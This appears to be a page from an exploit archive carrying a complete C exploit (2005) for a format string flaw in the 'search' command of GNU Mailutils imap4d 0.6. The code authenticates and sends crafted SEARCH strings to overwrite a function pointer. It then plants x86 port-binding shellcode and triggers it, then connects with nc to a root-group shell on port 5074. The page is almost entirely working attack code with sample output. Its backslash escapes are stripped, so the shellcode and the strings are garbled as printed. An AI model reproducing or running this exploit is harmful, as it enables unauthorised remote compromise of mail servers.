[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : GNU Mailutils imap4d 0.6 (search) Remote Format String Exploit
# Published : 2005-09-10
# Author : Cl??ment Lecigne
# Previous Title : WebAdmin <= 2.0.4 USER Buffer Overflow Exploit
# Next Title : FTP Internet Access Manager <= 1.2 Command Execution Exploit
/*
* GNU Mailutils 0.6 imap4d 'search' format string exploit.
* Ref: www.idefense.com/application/poi/display?id=303&type=vulnerabilities
*
* This silly exploit uses hardcoded values taken from GNU/Debian testing (etch).
*
* $ ./imap4d_search_expl -h 127.0.0.1 -p 143 -u clem1 -s PROUT
* [+] GNU Mailutils 0.6 imap4d 'search' format string exploit.
* [+] By clem1.
* [+] connecting to: 127.0.0.1:143
* [+] authentification: completed.
* [+] format string: sended
* [+] shellcode sended.
* [+] Bingo.
*
* id;
* uid=1000(clem1) gid=1002(mail) groups=0(root)
*
* Copyright (C) 2005 Clement Lecigne - clem1 @ badcode.info.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <getopt.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
struct values {
int offset;
int IO_file_close;
int addr;
char mailbox[32];
} v = {
11,
0x40468bc4,
0x80906e0, //0xaabbccdd
"inbox"
};
void usage(char *);
void auth(int, char *, char *);
void sendsc(int);
void owned(int, char *);
void fmtbuild(int);
/*
* s0t4ipv6@Shellcode.com.ar
* x86 portbind a shell in port 5074
*/
char sc[] = "x31xc0x50x40x89xc3x50x40"
"x50x89xe1xb0x66xcdx80x31"
"xd2x52x66x68x13xd2x43x66"
"x53x89xe1x6ax10x51x50x89"
"xe1xb0x66xcdx80x40x89x44"
"x24x04x43x43xb0x66xcdx80"
"x83xc4x0cx52x52x43xb0x66"
"xcdx80x93x89xd1xb0x3fxcd"
"x80x41x80xf9x03x75xf6x52"
"x68x6ex2fx73x68x68x2fx2f"
"x62x69x89xe3x52x53x89xe1"
"xb0x0bxcdx80";
char b[1024];
int i;
int main(int ac, char **av){
char o, *host, *user, *pass;
struct hostent *h;
struct sockaddr_in s;
int port, fd;
puts("[+] GNU Mailutils 0.6 imap4d 'search' format string exploit.");
puts("[+] By clem1.");
if(ac != 9) usage(av[0]);
while((o = getopt(ac,av,"h:p:u:s:")) != EOF) {
switch (o) {
case 'h':
host = optarg;
break;
case 'p':
port = atoi(optarg);
break;
case 'u':
user = optarg;
break;
case 's':
pass = optarg;
break;
default:
usage(av[0]);
break;
}
}
if((h = gethostbyname(host)) == NULL) {
herror("[-] gethostbyname()");
exit(1);
}
printf("[+] connecting to: %s:%dn", inet_ntoa(*((struct in_addr *)h->h_addr)), port);
fd = socket(AF_INET, SOCK_STREAM, 0);
if(fd == -1){
perror("[-] socket()");
exit(1);
}
s.sin_family = AF_INET;
s.sin_port = htons(port);
s.sin_addr = *((struct in_addr *)h->h_addr);
bzero(&(s.sin_zero), 8);
if (connect(fd, (struct sockaddr *)&s, sizeof s) == -1) {
perror("[-] connect()");
exit(1);
}
i = recv(fd, b, 1023, 0);
b[i] = 0;
if(strstr(b, "IMAP4rev1") == NULL){
puts("[-] failled.");
exit(1);
}
/* authentification. */
auth(fd, user, pass);
/* build and send evil format string. */
fmtbuild(fd);
/* store shellcode in imap4d rwx adresse space. */
sendsc(fd);
/* force a call to fclose, uhm no shellcode ;> */
owned(fd, host);
return 0;
}
void auth(int fd, char *user, char *pass){
memset(b, 0x0, 1024);
snprintf(b, 1023, "1 LOGIN "%s" "%s"n", user, pass);
if(send(fd, b, strlen(b), 0) == -1){
perror("[-] send()");
exit(1);
}
memset(b, 0x0, 1024);
i = recv(fd, b, 1023, 0);
b[i] = 0x0;
if(strstr(b, "Completed") == NULL){
puts("[-] LOGIN failled.");
exit(1);
}
memset(b, 0x0, 1024);
snprintf(b, 1023, "2 SELECT "%s"n", v.mailbox);
if(send(fd, b, strlen(b), 0) == -1){
perror("[-] send()");
exit(1);
}
memset(b, 0x0, 1024);
while((i = recv(fd, b, 1023, 0)) != -1){
b[i] = 0x0;
if(strstr(b, "Completed") != NULL)
break;
if(strstr(b, "Couldn't") != NULL){
puts("[-] SELECT failled.");
exit(1);
}
}
puts("[+] authentification: completed.");
return;
}
void sendsc(int fd){
memset(b, 0x41, 1024);
memcpy(b + 900, sc, strlen(sc));
memcpy(b + 1020, " An", 3);
memcpy(b, "3 LIST ", 7);
if(send(fd, b, strlen(b), 0) == -1){
perror("[-] send()");
exit(1);
}
memset(b, 0x0, 1024);
while((i = recv(fd, b, 1023, 0)) != -1){
b[i] = 0x0;
if(strstr(b, "Completed") != NULL)
break;
if(strstr(b, "BAD") != NULL){
puts("[-] LIST failled.");
exit(1);
}
}
puts("[+] shellcode sended.");
return;
}
void fmtbuild(int fd){
unsigned char b0, b1, b2, b3;
int a1, a2;
a1 = (v.addr & 0xffff0000) >> 16;
a2 = (v.addr & 0x0000ffff);
b0 = (v.IO_file_close >> 24) & 0xff;
b1 = (v.IO_file_close >> 16) & 0xff;
b2 = (v.IO_file_close >> 8) & 0xff;
b3 = (v.IO_file_close) & 0xff;
snprintf(b, sizeof b, "3 SEARCH TOPIC "
"A" /* pad. */
"%c%c%c%c"
"%%.%hdx"
"%%%d$hnn",
b3 + 2, b2, b1, b0,
a1 - 0x24,
v.offset);
if(send(fd, b, strlen(b), 0) == -1){
perror("[-] send()");
exit(1);
}
while((i = recv(fd, b, 1023, 0)) != -1){
b[i] = 0x0;
if(strstr(b, "BAD") != NULL)
break;
}
memset(b, 0x0, 1024);
snprintf(b, sizeof b, "3 SEARCH TOPIC "
"A" /* pad. */
"%c%c%c%c"
"%%.%hdx"
"%%%d$hnn",
b3, b2, b1, b0,
a2 - 0x24,
v.offset);
if(send(fd, b, strlen(b), 0) == -1){
perror("[-] send()");
exit(1);
}
while((i = recv(fd, b, 1023, 0)) != -1){
b[i] = 0x0;
if(strstr(b, "BAD") != NULL)
break;
}
puts("[+] format string: sended");
return;
}
void owned(int fd, char *host){
memset(b, 0x0, 1024);
snprintf(b, 1023, "3 SUBSCRIBE OWNEDn");
if(send(fd, b, strlen(b), 0) == -1){
perror("[-] send()");
exit(1);
}
puts("[+] Bingo.n");
sleep(1);
execl("/bin/nc", "prout", host, "5074", NULL);
printf("[-] muh? where is nc?n[+] A shell is waiting you on %s:5074.n", host);
return;
}
void usage(char *ex){
printf("usage: %s -h <hostname> -p <port> -u <user> -s <password>n", ex);
exit(1);
}
// www.Syue.com [2005-09-10]